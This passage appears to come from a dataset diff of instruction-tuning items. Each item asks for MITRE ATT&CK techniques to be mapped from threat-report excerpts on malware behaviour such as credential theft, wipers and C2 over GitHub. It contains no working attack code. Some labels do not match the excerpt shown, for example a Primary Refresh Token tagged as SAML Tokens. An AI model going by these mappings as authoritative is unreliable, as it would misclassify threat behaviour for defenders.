ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. While the malware uses a weak username and password dictionary to brute force itself into the service, it is also able to update its set from the C&C server, delete all the databases, and display the ransom message", + "output": "- T1110.001: Brute Force - Password Guessing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BITSAdmin tool - Win32 apps BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. Using BITS - Win32 apps Using BITS - bitsadmin examples Examples showing how to use the bitsadmin tool to perform the most common tasks. Background Intelligent Transfer Service - Win32 apps Background Intelligent Transfer Service (BITS) transfers files (downloads or uploads) between a client and server and provides progress information related to the transfers. cleanmgr Configure the Disk Cleanup tool (Cleanmgr.exe) to automatically clean up certain files. bitsadmin Reference article for the bitsadmin command, which is a command-line tool used to create, download, or upload jobs and monitor their progress", + "output": "- T1570: Lateral Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Talos has identified two different infection vectors associated with this particular campaign. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. In the first scenario, Talos discovered a document named \"\"MinutesofMeeting-2May19.docx\"\", that appeared to display the national flag of Jordan. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine\"", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5: 1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Steals Google Chrome and Apple Safari browser cookies from the victim\u2019s machine - Steals saved usernames and passwords in Chrome - Steals saved credit card credentials in Chrome - Steals iPhone\u2019s text messages if backed up to Mac - Steals cryptocurrency wallet data and keys - Keeps full control of the victim using the EmPyre backdoor - Mines cryptocurrency on the victim\u2019s machine", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Look for traffic to any of the related malicious domains identified in Appendix A. Use the signatures provided by FireEye to identify related activity. Make sure all credentials in an organization, including service accounts, are reset following a breach and that default passwords or those similar to previous passwords are not used. If you run an on-premise Exchange environment, consider adding alerting mechanisms to any EDR solutions for processes using the Exchange Management Shell PowerShell cmdlets listed in Appendix B. This may or may not be a valid detection approach depending on how frequently this is used within your organization. More generally, if the Exchange Management Shell is rarely used in a legitimate Administrative context, it may be worth investigating any historical use of this shell", + "output": "- T1482: Domain Trust Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It uses the\u00a0Windows service \u201cwinmgmts:\\\\.\\root\\SecurityCenter2 \u201d to check all AntiVirus products installed on the operating system. As shown below in the figure, it is done by creating the object the service \u201c winmgmts:\\\\.\\root\\SecurityCenter2 \u201d and executes the query \u201c Select * From\u00a0AntiVirusProduct \u201d by using the same object that is created of a mentioned service", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Flagpro v2.0 has another new function. If a dialog title is \u201cInternet Explorer [7-11]\u201d (the number after \u201cInternet Explorer\u201d depends on what version the user users) when Flagpro accesses to an external site, Flagpro sends WM_CLOSE message to close the dialog", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The file destruction algorithm is composed of two stages: a first stage to overwrite files and another to destroy the physical disk layout and the partition tables along with it. For the file destruction, it takes ownership of the files by modifying their ACL entries after it has obtained the 'SeTakeOwnershipPrivilege'. A file found will then simply be overwritten with zeros. This is done for the next 23 drives alphabetically (through \"\"Z:\\\"\"). On the second stage, the wiper attempts to set the drive layout of all the physical drives on the system numbered 9 to 0. This will wipe out all extended information about the physical drive's partitions including MBR, GPT and partition entries. Destroying the start of the files and the partitions tables is a common technique seen on other wipers, and its highly effective in preventing the file recovery\"", + "output": "- T1561.002: Disk Wipe - Disk Structure Wipe" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed\u00a0Cobalt Strike payloads crafted to maintain persistence through reboot via\u00a0a\u00a0scheduled task\u00a0on critical systems in victim environments. In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication", + "output": "- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This second request (Encoded Get System Information Request) is encoded using the same method as the custom TCP protocol used for communication with command-and-control servers, which uses a four-byte XOR encoding. Before acting on the request, Winnti will validate the third DWORD contains the magic value 0xABC18CBA before executing tasking", + "output": "- T1205: Traffic Signaling\n- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "an executable (also compressed, i.e. zip, rar or cab archive), sometimes pretending to be a different file format, like Dyreza - a document (commonly\u00a0PDF or\u00a0some MS Office format ) \u2013 like this Dridex downloader", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After \u201cGetExtendedTcpTable\u201d is executed and the process returns back to the second part of the code, it iteratively checks every record in the returned Tcp table. If any record contains the PID Waterbear wants to hide, it will remove the corresponding record, modify the record number inside the table, and continue to check the succeeding records", + "output": "- T1562.006: Impair Defenses - Indicator Blocking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We also observed a third approach used by a malicious document file to deliver Hancitor. Although the threat actor and command and control servers are similar to the second Hancitor delivery approach, this one uses an alternate tactic to reach its goal of data theft", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In october 2016 Group-IB published the report about the Cobalt group. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. Once installed, the malware checks for the existence of two files: keyword_parm.txt and parm.txt and attempts to read the configuration files every 30 seconds", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Strike. Use scheduled tasks and batch files for automation. The use of LOLBins. Erasing Windows Event Logs, files and tasks", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Then, it modifies the Team Viewer registry settings. As we said, the Team Viewer components used in this campaign are not the original ones. They are slightly modified. The malware author replaced all the entries of \u201cTeamviewer\u201d strings in Team Viewer components. TeamViewer client registry settings are then HKLMSoftwareGoldstagerVersion5 and HKLMSoftwareCoinstagerVersion5 correspondingly. The launcher sets up several registry values that control how the remote access tool will work. This parameter represents a hash of the password with which a remote user has to connect to Team Viewer client. After that, the starter executes the very Team Viewer client netsvcs.exe", + "output": "- T1219: Remote Access Software" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AQUATIC PANDA continued their reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details. OverWatch threat hunters also observed an attempt to discover and stop a third-party endpoint detection and response (EDR) service", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1007: System Service Discovery\n- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Konni malware family use a custom base64 key to encode the content of several files in the exfiltration phase. We observed the same flow of data reconnaissance and exfiltration across all campaigns", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the skimmer has the credit card details, it serializes the copied data into a string and encodes it with Base64. Then, it performs a character permutation on the encoded string to make sure it can\u2019t be directly decoded with Base64 decoding", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The HTTP request retrieves contents of the files present in the repository with an interesting validation which checks that the retrieved file is a PNG. The file that was earlier retrieved was named \u201creadme.png\u201d; this PNG file has one of the malicious modules embedded in it. It then executes GetNumberOfMethods and saves the result obtained by the module. This file committed to the repo contains the result of the commands executed by the module on the target system. To commit the file the malware makes a PUT HTTP request to Github", + "output": "- T1564.001: Hide Artifacts - Hidden Files and Directories" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note", + "output": "- T1204.001: User Execution - Malicious Link\n- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Writes itself to %AppData%\\Microsoft\\Word\\log.ps1 2) Sets up persistence for this file, using a run key. 6) Removes all registry entries that are left behind during the dropper process", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The process identifiers or PIDs to be hidden are stored in the shared memory \"\"Global\\<computer_name>.\"\" If the shared memory doesn't exist, it takes the PID embedded by the first-stage shellcode. In this case, the intention of the malicious code is to hide Waterbear\u2019s backdoor activities from the security product. Therefore, the first-stage shellcode takes the PID of the Windows Service \u2014 which the first-stage shellcode and the succeeding backdoor both inject into \u2014 hides the target process, and embeds that PID into the second-stage shellcode\"", + "output": "- T1055.003: Process Injection - Thread Execution Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Since version 0.4.1 Creates a new Primary Refresh Token (PRT) as JWT to be used to sign-in as the user", + "output": "- T1606.002: Forge Web Credentials - SAML Tokens" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Also, the postinstall script moves the .CrashReporter program to a new location /Library/JMTTrader/CrashReporter and makes it executable. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches CrashReporter with the Maintain parameter and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004", + "output": "- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The HTTP request retrieves contents of the files present in the repository with an interesting validation which checks that the retrieved file is a PNG. The file that was earlier retrieved was named \u201creadme.png\u201d; this PNG file has one of the malicious modules embedded in it. It then executes GetNumberOfMethods and saves the result obtained by the module. This result is committed to the remote repo under the metafiles directory with a filename denoting the time at which the module was executed. This file committed to the repo contains the result of the commands executed by the module on the target system. To commit the file the malware makes a PUT HTTP request to Github", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The bot attempts to create a MUTEX using the value of variable \u201cVL\u201d to ensure that only one instance of the bot is running. The bot will proceed to create a copy of itself as %TEMP%/svchost.exe, execute that file, and terminate itself. The newly executed copy will create an autostart registry key to ensure persistence upon system reboot", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We will discuss the Spark backdoor\u2019s functionality in detail later in this blog, but this specific sample has the following configuration", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which will be sent back to the operators", + "output": "- T1082: System Information Discovery\n- T1124: System Time Discovery\n- T1069.002: Permission Groups Discovery - Domain Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Embedded Downloader Trojan The M payload (referenced previously along with the R payload, above) injected and executed within the memory space of the other process is a downloader Trojan. This specific downloader appears to have been created using a VB2Exe tool, as the functional code that carries out the downloading functionality exists as a VBScript embedded within the payload. The payload extracts this VBScript from a resource and saves it to a file that it extracts from another resource. The payload is downloaded from the following location and saved to \"\"%PUBLIC%\\svchost32.exe\"", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The script \u201cenu.cmd\u201d created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name \u201cadministrator\u201d in Spanish, Italian, German, French, and English", + "output": "- T1098: Account Manipulation\n- T1562.004: Impair Defenses - Disable or Modify System Firewall" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If nothing like that is detected, the malware will decrypt the third stage and execute it by using the process hollowing technique, commonly used by malware authors. In this version, the payloads are encrypted with the same XOR-based algorithm as the one used in previous versions, however in this latest version, the payload is encrypted twice, with different keys", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As mentioned in the table above, version 3 has two forms - one is an independent executable, and the other is a loader that loads a DLL from the resources section and executes it. Even before doing any static / dynamic analysis, we can use VirusTotal to determine that the resources section probably contains more data, in this case an encrypted DLL that is loaded into memory", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific 